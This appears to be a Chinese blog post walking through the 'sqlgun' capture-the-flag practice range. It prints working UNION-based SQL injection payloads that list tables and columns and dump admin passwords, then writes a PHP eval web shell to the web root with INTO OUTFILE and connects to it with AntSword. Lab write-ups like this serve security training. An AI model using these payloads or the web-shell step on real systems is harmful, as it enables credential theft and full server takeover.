当前位置: 首页 > article >正文

sqlgun靶场训练

article 2024/11/13 12:12:27

1.看到php?id=  ,然后刚好有个框,直接测试sql注入

2.发现输入1' union select 1,2,3#的时候在2处有回显

3.查看表名

-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()#

4.查看列名

-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='admin' #

5.查看admin的密码

-1' union select 1,group_concat(id,admin,password),3 from admin #

6.目录扫描发现有一个phpinfo.php,访问绝对路径

6.构造一句话木马语句

-1' union select 1,'<?php @eval($_POST[cmd]);?>',3 into outfile '/var/www/html/q.php' #

7.蚁剑连接

8.根目录找到flag


http://www.kler.cn/a/309764.html

相关文章:

  • 【Elasticsearch入门到落地】1、初识Elasticsearch
  • Python如何从HTML提取img标签下的src属性
  • 【Linux】基础IO及文件描述符相关内容详细梳理
  • 吾店云介绍 – 中国人的WordPress独立站和商城系统平台
  • AI大模型开发架构设计(14)——基于LangChain大模型的案例架构实战
  • 鸿蒙华为商城APP案例
  • 【机器学习】--- 自然语言推理(NLI)
  • SPI软件模拟读写W25Q64
  • Qt常用控件——QLCDNumber
  • scantf
  • Linux--守护进程与会话
  • Java 中 List 常用类和数据结构详解及案例示范
  • 基于python+django+vue的外卖管理系统
  • java循环遍历树状结构对象并转换成另外树状结构对象
  • 6.安卓逆向-安卓开发基础adb工具
  • 学习贵在善假于物
  • 什么是科技与艺术相结合的异形创意圆形(饼/盘)LED显示屏
  • YooAsset基础操作及热更
  • 自监督的主要学习方法
  • Web植物管理系统-下位机部分
  • Facebook主页,广告账户,BM被封分别怎么解决?
  • sicp每日一题[2.17]
  • Ubuntu上如何使用sh文件更新CMake
  • 【二十一】【QT开发应用】ListWiddget图标模式
  • yolo自动化项目实例解析(二)ui页面整理
  • 组件上的v-model(数据传递),props验证,自定义事件,计算属性